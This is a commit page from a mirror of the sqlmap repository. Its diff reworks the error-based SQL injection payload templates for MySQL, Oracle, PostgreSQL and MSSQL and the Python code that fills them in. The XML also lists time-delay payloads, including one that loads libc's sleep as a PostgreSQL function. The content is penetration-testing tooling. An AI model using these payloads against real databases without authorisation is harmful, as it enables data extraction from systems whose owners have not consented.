sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 08:14:24 +03:00
Code Issues Packages Projects Releases Wiki Activity

added randInt to error injection vectors

Browse Source
This commit is contained in:
Miroslav Stampar 2010-10-20 08:56:58 +00:00
parent dabbcf9e23
commit b032fdbf74
2 changed files with 8 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
lib/request/inject.py
View File

@ -19,6 +19,7 @@ from lib.core.common import expandAsteriskForColumns
from lib.core.common import parseUnionPage
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import readInput
from lib.core.common import replaceNewlineTabs
from lib.core.common import safeStringFormat
@ -337,6 +338,8 @@ def __goError(expression, resumeValue=True):
Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter.
"""
logic = conf.logic
randInt = randomInt(1)
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
@ -362,7 +365,7 @@ def __goError(expression, resumeValue=True):
debugMsg = "query: %s" % expressionUnescaped
logger.debug(debugMsg)
forgedPayload = safeStringFormat(payload, expressionUnescaped)
forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
result = Request.queryPage(urlencode(forgedPayload), content=True)
match = re.search(queries[kb.misc.testedDbms].errorRegex, result[0], re.DOTALL | re.IGNORECASE)

9
xml/queries.xml
View File

@ -24,7 +24,7 @@
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((%s),CHAR(58),CHAR(120),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+?)' for key"/>
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT((%s),CHAR(58),CHAR(120),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+?)' for key"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER()"/>
@ -91,8 +91,7 @@
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<!--<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>-->
<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/>
@ -176,7 +175,7 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="AND 1=CAST((%s)::text||CHR(58)||CHR(120)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/>
<error query="%s %s=CAST((%s)::text||CHR(58)||CHR(120)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/>
@ -243,7 +242,7 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<error query="AND 1=CONVERT(INT,((%s)+CHAR(58)+CHAR(120)+CHAR(58)))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+?)' to data type int"/>
<error query="%s %s=CONVERT(INT,((%s)+CHAR(58)+CHAR(120)+CHAR(58)))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+?)' to data type int"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/>
<current_user query="SELECT SYSTEM_USER"/>